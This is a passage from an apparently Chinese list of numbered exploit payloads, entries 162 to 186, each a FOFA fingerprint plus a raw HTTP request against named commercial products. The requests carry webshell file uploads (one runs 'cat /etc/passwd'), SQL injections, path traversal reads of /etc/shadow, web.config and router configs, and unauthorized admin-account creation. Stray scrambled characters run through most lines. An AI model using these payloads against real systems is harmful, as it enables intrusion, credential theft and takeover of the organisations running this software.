162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
/ z/ R; a. ^( V& mFOFA: app="和丰山海-数字标牌"
# |; [2 d# [, s5 q; XPOST /QH.aspx HTTP/1.1
1 \0 w( _) I% N, B1 [Host: x.x.x.x' t# M+ w: \) \) s: l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.07 s; F+ e. \9 i4 r, a9 S
Connection: close
( e N" v( U. s/ u( RContent-Length: 583
2 }4 u$ `6 O# A: @Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
$ ~& v2 A$ K% A, O+ ]5 ^Accept-Encoding: gzip9 e/ L4 U6 ]* Y( u ^& a, Z
, {- K! c F% ?1 P- V9 H6 j* l
------WebKitFormBoundaryeegvclmyurlotuey0 \- A4 v, ], r% o, W
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"* w9 b4 a7 D |8 [, }4 M; R
Content-Type: application/octet-stream
1 r) ^) W% H" o
2 N9 ]2 m2 [- C2 A6 h! w6 V: @9 M% _2 D<% response.write("ujidwqfuuqjalgkvrpqy") %>
3 l% ]4 v' m6 M) s1 {$ W& v: V------WebKitFormBoundaryeegvclmyurlotuey
$ D9 P2 {' T1 O; {- ~Content-Disposition: form-data; name="action"
& }' Q6 G- f3 o3 y; O; @5 N; X7 I5 i
upload: i3 C" l+ ]+ ^4 R9 D/ |' R9 a4 L2 o# @
------WebKitFormBoundaryeegvclmyurlotuey3 q) @8 b( y" z
Content-Disposition: form-data; name="responderId"
% X0 M& D4 F5 v% g G
. p2 `7 r; ?$ i- G6 fResourceNewResponder. ]) R- ~! H, [' g; E+ Y- O& h' o7 `
------WebKitFormBoundaryeegvclmyurlotuey
. [6 R9 d# [- N( _$ ]. D. ?Content-Disposition: form-data; name="remotePath"
( j: D* ], S3 u7 L: C" \
4 A1 k2 B$ K. b2 j/opt/resources
1 v& e" ~' R2 _! S% v------WebKitFormBoundaryeegvclmyurlotuey--1 y; e+ G9 J+ j2 i* |) R( L. N
8 B8 o" n2 O2 Z
: X; i. y6 B* k9 n. X% Shttp://x.x.x.x/opt/resources/kjuhitjgk.aspx
! D3 j1 \, j, d0 K+ q% u
4 y6 g9 |, v" y& Z0 P3 U+ K i163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
5 H! y9 m! |8 x8 J8 J, `! bFOFA: icon_hash="-795291075"% R8 m$ L' a/ }& s$ J& `
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.19 e6 g1 W/ v, o* i3 T
Host: x.x.x.x1 i8 e0 E/ v/ e8 P7 Z. f1 o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.368 |5 i% |1 P* X
Connection: close+ E! k& ?: Q7 I! V( F0 O" z
Content-Length: 2932 A" h, j* C' T7 y9 A. p- X
Accept: */*
+ s7 |1 ^4 b9 R' M$ PAccept-Encoding: gzip, deflate3 A/ O7 o# b- m* t
Accept-Language: zh-CN,zh;q=0.9( O, F" l2 Q0 L: M
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
. l' u, n0 Y' n& G* H
1 m' m! u& M9 v6 y: ^------iiqvnofupvhdyrcoqyuujyetjvqgocod1 V4 }7 w4 s' w
Content-Disposition: form-data; name="name"6 i2 i1 y" j& O9 u9 n& k
# F4 L' ^$ _7 z0 e0 @) D
1.php; f8 r. j6 g0 Z
------iiqvnofupvhdyrcoqyuujyetjvqgocod
! c# I1 E! Q( l8 b% KContent-Disposition: form-data; name="upfile"; filename="1.php"$ T: ?* _; f: C! M: Z
Content-Type: image/jpeg" \; s z4 N, I' @; J" O1 C9 F
5 y) k( c; R( Hrvjhvbhwwuooyiioxega0 o3 n1 }9 l! z# m
------iiqvnofupvhdyrcoqyuujyetjvqgocod--% ?, w: k# A6 W0 i
1 [( j' h' \: J4 D
% }) Q# W I! X; T/ u% t164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
& N6 \7 X% @& [: K0 ^FOFA: title="智慧综合管理平台登入"
+ t8 _/ N# T$ {POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
8 j# ?, ~/ e( m, ^Host: x.x.x.x
2 c% H# ]0 {9 F: w0 i; u: M2 \; ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.01 L4 j+ x% a7 y
Content-Length: 288+ c8 F# s8 M k
Accept: application/json, text/javascript, */*; q=0.01
! m% {; C9 U3 @. PAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,5 S3 R9 j& `) U# N+ Y
Connection: close
) c4 i: l+ a, \Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
; ]* D3 X) {8 T) B! t8 w7 gX-Requested-With: XMLHttpRequest& u' e: [3 T0 W- S/ q6 l. `
Accept-Encoding: gzip
2 y. f! r) ^8 D2 }# G7 r4 R/ L
# x# V3 K" i( ^, H% D0 s p6 g! `------dqdaieopnozbkapjacdbdthlvtlyl
+ e2 C% U5 S7 |* C& W1 cContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
9 \6 [$ Z! u {5 N. e9 hContent-Type: image/jpeg
2 I' p. ]- B# t% `/ H' o) X& U/ e
0 \' Q3 }3 d' J<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
; Y6 ?, @8 [! Q( e; ?------dqdaieopnozbkapjacdbdthlvtlyl--
( V4 [; t' x i ]! A0 h j: N c' l
$ i% g0 y) b) A5 r# Q+ [2 N# ?: z
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
. _. w4 O* u% f- P8 v9 X; `" _# Y$ C6 |
165. OrangeHRM 3.3.3 SQL 注入 Q) N4 b$ G6 h$ O
CVE-2024-36428
a& ]8 ?% |6 c5 N: f; \FOFA: app="OrangeHRM-产品"8 N8 a" Q# r4 x$ W9 P' S' G
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))! j( ?* ]) ?# W! |
7 x" N' T" _# j0 P* r
; p( {6 R+ Y9 q3 A- `. [166. 中成科信票务管理平台SeatMapHandler SQL注入5 }; B6 @$ P( B1 }+ O$ t' |' {# h: v
FOFA:body="技术支持:北京中成科信科技发展有限公司"
+ ^3 O" A# S B* I* Q& D# |POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
9 U+ ]; X8 g6 k7 @4 R5 bHost:8 y# w; m8 H {% Q) n. F# w% r
Pragma: no-cache" B; |2 {8 X# a) J+ d* Q
Cache-Control: no-cache# v" A, U+ B- X' u$ l6 v
Upgrade-Insecure-Requests: 1/ a$ D& \& ?. ?! o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
9 o- D, E+ p/ hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ a/ B9 A4 j8 W3 [ \. ?
Accept-Encoding: gzip, deflate" O/ W$ A0 Q4 ?6 Q+ y4 A
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
. \" `: z& |0 ?! M8 H; NCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE( s5 y* j/ W8 E; Q/ X8 M y x7 z% i& D
Connection: close
% B1 h" P3 M" S; ^* l- y, eContent-Type: application/x-www-form-urlencoded
7 h: n* }$ @6 f% ZContent-Length: 89
( D/ k F) S3 t, z7 N% Z; y8 N9 b% B/ R! ]& P+ @% t( Y8 ?
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE, R7 m* X @$ Y. R. _
" n7 K( j0 M' U2 ^, L* s* Q
( y& l% I' ~4 v2 ^( W3 J167. 精益价值管理系统 DownLoad.aspx任意文件读取# s0 E7 P- z" ~ W, J
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
. v1 K& T/ T( I4 ]0 gGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1- E5 B$ _; Z9 o( o8 u$ {
Host:
( T# }! b) G( I- JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 {5 I( f! P# e+ {( o+ p" k
Content-Type: application/x-www-form-urlencoded5 n! A; y, f4 E! e, r# Y( ]9 o8 h
Accept-Encoding: gzip, deflate
5 }& R$ D' I! u/ iAccept: */*
' I- H1 R. H/ f+ }Connection: keep-alive
4 S1 s3 k2 |1 r. b0 A$ s( x+ f0 x9 M; M4 r W# K8 w
( M0 [$ g9 m6 d- \0 Q$ l0 C' Y7 E
168. 宏景EHR OutputCode 任意文件读取
; D& q! l* \! {FOFA:app="HJSOFT-HCM"
: _" ?5 \- ]! E( m: c% BGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1: p5 G7 S6 p$ B6 U4 h/ ]9 i/ e7 G$ K
Host: your-ip& C8 D+ _/ \/ D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
3 F' O) J( W% o3 K% Q- SContent-Type: application/x-www-form-urlencoded- A- S& v' \" U# f
Connection: close& B1 e) F1 k: k7 `2 \
% |" ]+ r! N& t; s4 b- ?
8 p, C, Q# z* Y$ v/ q
- U N3 y$ m5 r: ?% p% K) F! a169. 宏景EHR downlawbase SQL注入' X4 W# F( Q# T; W- _* j
FOFA:app="HJSOFT-HCM"
* u! n6 E L4 u- j2 HGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1" m5 \# ~" U& X
Host: your-ip
+ j7 x1 o- X( I, _( y+ MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
% t: P- w. M9 s7 W# k% m$ BAccept: */*
4 M) U7 m. o2 tAccept-Encoding: gzip, deflate9 i* q# s) ~1 F& f U/ A; n5 D; ]
Connection: close
' V$ C# }$ Z% K, E
3 t; h" c- `% k4 L. h; A6 G; [# F
. {9 i6 c" y6 m0 i) o/ C& ]* M" I; j# y8 {* t* ~" d# ?4 j! _
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
+ r, D1 t7 b u$ A9 G0 K3 ?FOFA:body="/general/sys/hjaxmanage.js"
$ \. R3 y% R s% S" @3 wPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1: Q/ Z; x& ?4 B4 _1 [6 E' f
Host: balalanengliang
0 H7 x# K: j, y& oUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36- M! O t& k' M z
Content-Type: application/x-www-form-urlencoded
, X* J8 [3 _0 v D1 _
+ i$ o4 X3 M) X afilename=../webapps/ROOT/WEB-INF/web.xml
1 w, ^9 O% {: C3 @6 n f+ C
! C. @5 I# C! R- q
5 R+ ^. `- e* `( t- I171. 通天星CMSV6车载定位监控平台 SQL注入5 S4 J$ Z5 V% V- B
FOFA:body="/808gps/" v; N/ M9 F3 ^( B4 e
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1& k" s5 Z* U2 A) I% u
Host: your-ip$ B+ X/ \" n5 s. V2 b
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0+ F5 s2 b9 P1 ]3 q, `; K
Accept: */*
" [" q+ P. C% T3 d) C& x- B. YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! A, u+ t2 i* E& ]
Accept-Encoding: gzip, deflate
* g4 B4 Y# q. D& }5 n. Z# W, AConnection: close: U) o$ a" O+ a- w" l4 i
. A" O4 B( D% ?4 E
. \1 c. ]4 R& H2 R6 F% Z
. b, O9 a" d2 w$ y172. DT-高清车牌识别摄像机任意文件读取
l$ D4 W' T( L ?. ]FOFA:app="DT-高清车牌识别摄像机": T$ W" l9 H+ e
GET /../../../../etc/passwd HTTP/1.1
& z$ r4 Y, f, e# sHost: your-ip+ T3 V1 |7 v# g/ d6 K" Y& I! Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" [6 v2 W: c4 _1 C1 V% l
Accept-Encoding: gzip, deflate
# v2 Q+ d- I2 b4 XAccept: */*9 D R8 s2 h* \( d* a+ Z3 R* b
Connection: keep-alive( i8 o: T) F) a) U
1 r7 F$ |* }5 E1 C3 {' i
6 Y' ?- p" _& g5 ~7 q
% [! {+ J( q- j2 Q173. Check Point 安全网关任意文件读取
9 E* m# T: d( I0 I1 N$ LCVE-2024-24919
+ `8 S6 ?- y1 d$ z. m/ Z& b; t7 s/ PFOFA:app="Check_Point-SSL-Network-Extender"
/ ~3 x( J4 G0 i9 n* m' xPOST /clients/MyCRL HTTP/1.1. c! J+ X) v, _' H
Host: your-ip
0 ?3 W$ T% E: p( i4 pContent-Type: application/x-www-form-urlencoded t$ I6 ]5 Q2 z$ R
- @6 {. p" `) t6 e" f4 faCSHELL/../../../../../../../etc/shadow- Q q! U8 f9 w& n% ?
- [+ M' W1 P& j' i" H
3 @* E) N- W9 X; l5 W0 m
c* Y0 A( J5 Q" H0 ~. j0 h4 R174. 金和OA C6 FileDownLoad.aspx 任意文件读取
0 r. K/ o9 V! z7 XFOFA:app="金和网络-金和OA"0 J3 A# z y2 p% o- H
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
# e! J) ?% m/ A& M MHost: your-ip
( K6 L" K- _: @' oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36+ H: g4 {8 e7 e3 t" o$ ^5 t2 L% @; ^3 K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. ?2 R- N9 T6 h* q9 H9 ]Accept-Encoding: gzip, deflate, br4 a7 B+ ?% i+ D- Q
Accept-Language: zh-CN,zh;q=0.96 ?, c4 j# t' x' o+ A7 d
Connection: close: L! S- e1 `* q
! ?- L$ z) e) \6 [' Z, F! f1 w1 o, g9 E& p% _
o+ j [+ C" Q8 J# D( G( L
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入( k$ e% C* a) P {
FOFA:app="金和网络-金和OA"7 X) L6 `" @* X) U
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
, r% W( M D/ c" v1 m( v# }Host:
/ P" x# n* Z" n" O$ K! yUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36! ~) W3 f: c: U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 o3 g( V. a J* LAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% c: z5 w1 n, i; q9 ~
Accept-Encoding: gzip, deflate
% _" \4 Y& W# e0 z3 C8 yConnection: close
. N! v& I. g8 x/ E. M4 Z/ f6 I$ l) RUpgrade-Insecure-Requests: 1
$ T& X. D/ R6 R. m7 Q. b: w5 w
1 v5 G' i8 E+ g' {' K8 n9 p, G
" E$ o7 b9 P6 S8 J176. 电信网关配置管理系统 rewrite.php 文件上传
/ `. R! t, Q- R+ E5 r4 iFOFA:body="img/login_bg3.png" && body="系统登录"6 T% O' n% c+ o* |. R" Y
POST /manager/teletext/material/rewrite.php HTTP/1.1
* F- L9 A' t" V; v. k+ fHost: your-ip
+ X B2 \) d/ M' ^% bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.00 u8 W2 i. p3 A2 r7 e8 u ~
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT- y+ d0 f: C* `/ `% m
Connection: close) \" {8 e8 M, L2 s2 _# k
4 e7 O. @9 I( c! n
------WebKitFormBoundaryOKldnDPT
) U' E$ e. Q7 S! \6 tContent-Disposition: form-data; name="tmp_name"; filename="test.php"
! i# f. [4 [5 _: c: y& m5 f# CContent-Type: image/png: ~7 l1 p5 N* A2 H) }$ e
2 x; K( p4 u$ J# T! i* n, i7 Y
<?php system("cat /etc/passwd");unlink(__FILE__);?>
/ Q% E+ o4 U( O L2 v------WebKitFormBoundaryOKldnDPT* I5 O2 ]" e, b6 w2 D0 v- O
Content-Disposition: form-data; name="uploadtime". E2 ^- c! n6 l B7 f
& v9 H2 P8 @ A; M / |* X% z; S6 L% Q; Z% @; a
------WebKitFormBoundaryOKldnDPT--2 c0 [& A) O! C( H$ [/ U
$ C' c2 A9 ^, P* k3 R; c
# Z# ^- q0 q) @' m1 S0 T3 N6 w4 Y4 r4 J- }3 ~+ p7 M
177. H3C路由器敏感信息泄露
; H2 z b0 p ?" n& n& s/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg4 |7 p+ E# {( Y. B7 w# w) ]7 V
/userLogin.asp/../actionpolicy_status/../M60.cfg; d! i/ _4 Q/ @0 A' v! q: [
/userLogin.asp/../actionpolicy_status/../GR8300.cfg4 W0 A3 M0 ^8 Z$ j( u
/userLogin.asp/../actionpolicy_status/../GR5200.cfg- {8 e2 w* Y2 R, V% e! b2 D$ W
/userLogin.asp/../actionpolicy_status/../GR3200.cfg. \) L; g' H6 R1 ~
/userLogin.asp/../actionpolicy_status/../GR2200.cfg( e" q$ ?& t, L N
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
. `0 v; b- i Y/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
. I0 u/ u- ]6 u6 C& P! Z/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
- X4 V3 |# w% y" U/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg5 B4 h1 F" W4 i7 m4 h" \& n& k
/userLogin.asp/../actionpolicy_status/../ER5200.cfg# a- l8 D! Y3 p; R8 J
/userLogin.asp/../actionpolicy_status/../ER5100.cfg0 Y) ?6 A M( `0 t, ^/ C% m
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg4 s3 Z& q( B9 H$ a4 |% J, w# x$ q2 h
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
' V. B* Z9 Y. j3 f& U5 f% F5 a/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
* p; Z/ j' Q' s. R' u1 c/userLogin.asp/../actionpolicy_status/../ER3200.cfg0 D$ x I3 x, t5 U3 y
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg* _! V& F' _+ R p+ [3 Q% L
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
6 X" s+ C/ |6 a3 p( m6 r4 M$ x. X z/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
* {0 P1 o0 @% N+ p a) C- ~1 y# H/userLogin.asp/../actionpolicy_status/../ER3100.cfg
' [: L) ~# x; n' y \- K/ Z/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
$ n" o1 K a& X' C, P" m
: n( q' R n$ J( u# G3 _4 W/ _
! m3 W. s, U7 S178. H3C校园网自助服务系统-flexfileupload-任意文件上传8 V5 w! ~) d7 t
FOFA:header="/selfservice"2 j, Z8 N, f" ^0 `4 B7 c9 d
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.12 [# @# F7 G! w! V% l+ v/ _# `
Host:7 L7 ~3 |0 c* ?# ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
" e5 y# U6 e4 @0 S1 j1 zContent-Length: 252
7 I& u r' p% A& P9 JAccept-Encoding: gzip, deflate
9 a: C7 ~2 }; r6 ?Connection: close. j0 {# K3 H3 [2 A6 o
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l' w2 |/ z4 O5 T9 G. N9 n% G, [
-----------------aqutkea7vvanpqy3rh2l. z. X- m/ @+ `& ~, Q! h+ H
Content-Disposition: form-data; name="12234.txt"; filename="12234"
: k6 l; L G; Q QContent-Type: application/octet-stream& J; u! c0 ~' W) v. ]. \) h
Content-Length: 2553 T3 V- b$ Z9 O$ X1 o
4 H; G# V; W" P
12234
5 f0 a! ~; X) B. Z( X6 K-----------------aqutkea7vvanpqy3rh2l--
S! o% ]7 V; A3 N' |+ b& \( ]
% P( ~3 |- s( j# j# I1 U, [; L6 I. W% Y U5 u
GET /imc/primepush/%2e%2e/flex/12234.txt
* Y9 i7 Z& c, R9 Y% D8 x
% r- g M A1 q8 B. A1 f5 k% x
+ d' P* k( ?/ g179. 建文工程管理系统存在任意文件读取2 x" `4 a. E9 T+ t. e& y8 a) R
POST /Common/DownLoad2.aspx HTTP/1.1: U) O0 h/ @' R
Host: {{Hostname}}
7 ?0 V7 j( |+ f1 H( c* KContent-Type: application/x-www-form-urlencoded
" |# I% y$ `9 H$ x* s# w0 ?% HUser-Agent: Mozilla/5.0& ~7 h& g3 {! O: O- r
2 b( `7 |5 f( V: ~$ kpath=../log4net.config&Name=
! c% ^: y% f& G7 W9 N4 Q9 Z2 g( m, E) Y9 S# [
8 ^ i1 A- }0 K$ f4 z( _% J; A180. 帮管客 CRM jiliyu SQL注入
. j" x' E5 j$ Z; AFOFA:app="帮管客-CRM"
- @0 q8 N& G- c! x3 D/ h" }GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.15 Y w5 K1 ~2 l6 ^
Host: your-ip
0 i, ?0 ]- A7 |$ aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36) L( B* c. ~# ?) i8 f8 I$ C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 [2 c' j+ n+ }Accept-Encoding: gzip, deflate
* B; N) H, ?8 S2 YAccept-Language: zh-CN,zh;q=0.9) U% |: A. U( G, d8 ~$ T+ _3 g
Connection: close
; e5 Z! ^% z( E; ^6 T& @9 E* u0 ~+ {
% o k r4 m4 \: l5 }% E6 C5 n7 ^
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入& W3 N! M: x& K2 C% ^& ~* J
FOFA:"PDCA/js/_publicCom.js"
! ?6 R+ h, e4 E, C; e$ aPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1; N& x2 V J, x3 @% k N
Host: your-ip
2 R) l( ]( K8 }+ ?; X1 PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
: E8 V0 h- i/ ~* K; t9 yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) ?7 c7 k6 p1 PAccept-Encoding: gzip, deflate, br
5 F4 C9 C, I& Z) w9 h1 l! VAccept-Language: zh-CN,zh;q=0.9
5 {4 {9 b( a6 ^5 B4 \Connection: close
4 W4 M0 N c# J, c: W3 ]0 k5 jContent-Type: application/x-www-form-urlencoded
' u+ S/ Z O% v2 ~! l7 m& U+ @2 [1 {& k/ o# F9 u: Q. b
1 r( L" F4 k! j$ _+ o; v9 R5 \
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20& {0 B! N9 z+ T' `
3 c& s X9 A6 U
$ ]+ p, r( P& v: t/ z+ K182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
! `. x7 K7 D* S! H$ MFOFA:"PDCA/js/_publicCom.js"+ d0 F1 W- O( @! s! i: i! R
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
, A$ J( x7 _, q+ o2 I, |Host: your-ip
/ X3 ?% A, Z* k# v: JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
1 H$ o7 K/ e8 a; e" e0 A, _ bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
B; n( A5 R5 r0 d5 _& ^: cAccept-Encoding: gzip, deflate, br% T6 d8 F7 i+ ]6 Z9 T+ ^$ t
Accept-Language: zh-CN,zh;q=0.92 y; j j* H1 b+ i( T) T8 N$ J/ l" T
Connection: close
8 V+ n. e7 R. F( i/ k- hContent-Type: application/x-www-form-urlencoded: y' V8 k. T9 }( E0 R0 J4 {
& O& K4 c7 a+ I# y# v
& M/ U& n$ H! V' y
username=test1234&pwd=test1234&savedays=1
+ A3 J, R8 E6 t
* j8 l+ R: K) J6 B4 @3 u5 |( h4 |0 c
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
. M4 I7 V+ [, l$ }: FFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"' N/ y6 P, L# M7 P7 y1 t* D8 |7 o
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
4 x" B1 ]0 h5 _1 j2 M; ]Host: your-ip3 Z( l; ^% }7 c+ D! a7 T
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
" l: C7 O" j$ i F( c- j1 RAccept-Charset: utf-8
% g* S1 X( n: V/ T' nAccept-Encoding: gzip, deflate' Q! {% z5 z1 Q, w' V$ P
Connection: close
' @1 Z' T9 R4 P2 v) v( @ ~4 Z- [( H) D- C) D
& b) p9 ?9 O7 b. Y184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
5 A# T" o# l7 \FOFA:server="SunFull-Webs"
7 r" j* Y5 x7 ~5 \$ \POST /soap/AddUser HTTP/1.1
5 L/ f+ `) P( f* c4 I/ J# _: @3 fHost: your-ip" e: |$ H7 t& n5 S8 C' N2 B4 ?
Accept-Encoding: gzip, deflate u& H6 z2 X0 f0 @- s8 D9 i) s T! [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
8 ~1 F2 l& k) p" _2 i& F) L: [4 z7 ]6 nAccept: application/xml, text/xml, */*; q=0.01
3 D$ m* b% z; V2 C2 CContent-Type: text/xml; charset=utf-8& v. X+ {4 R, n
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( J l2 |; S" Y! l6 p. A( zX-Requested-With: XMLHttpRequest
% X& V# D! M" X8 |; T0 @6 J' G# ?& K1 y7 f
1 d( d7 P: \7 Y! Z
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')/ Q2 Y& P0 ^ K0 j7 N
5 | W# k0 z! r9 a' W$ w
% @0 c) ~: \( V t* E& f
185. 瑞友天翼应用虚拟化系统SQL注入# S1 f% U6 i# m
version < 7.0.5.1% j" d" {9 i) k
FOFA:app="REALOR-天翼应用虚拟化系统"
" h7 l) _7 T/ {$ E; W# Q5 gGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.17 D. Z4 x$ E' j6 t$ f6 u( Q
Host: host! _) h1 J; r* \% U* i, K$ f
6 T- s3 m( f3 t6 w: f: M+ b9 b! t& v. O7 J9 \) q$ f, k
186. F-logic DataCube3 SQL注入
1 d: T7 @5 u$ S* P O4 `9 xCVE-2024-31750
% m/ B$ v2 [. ~$ W( p6 XF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统$ w6 U6 h! E7 ^
FOFA:title=="DataCube3"' }) ]& g- U$ J
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
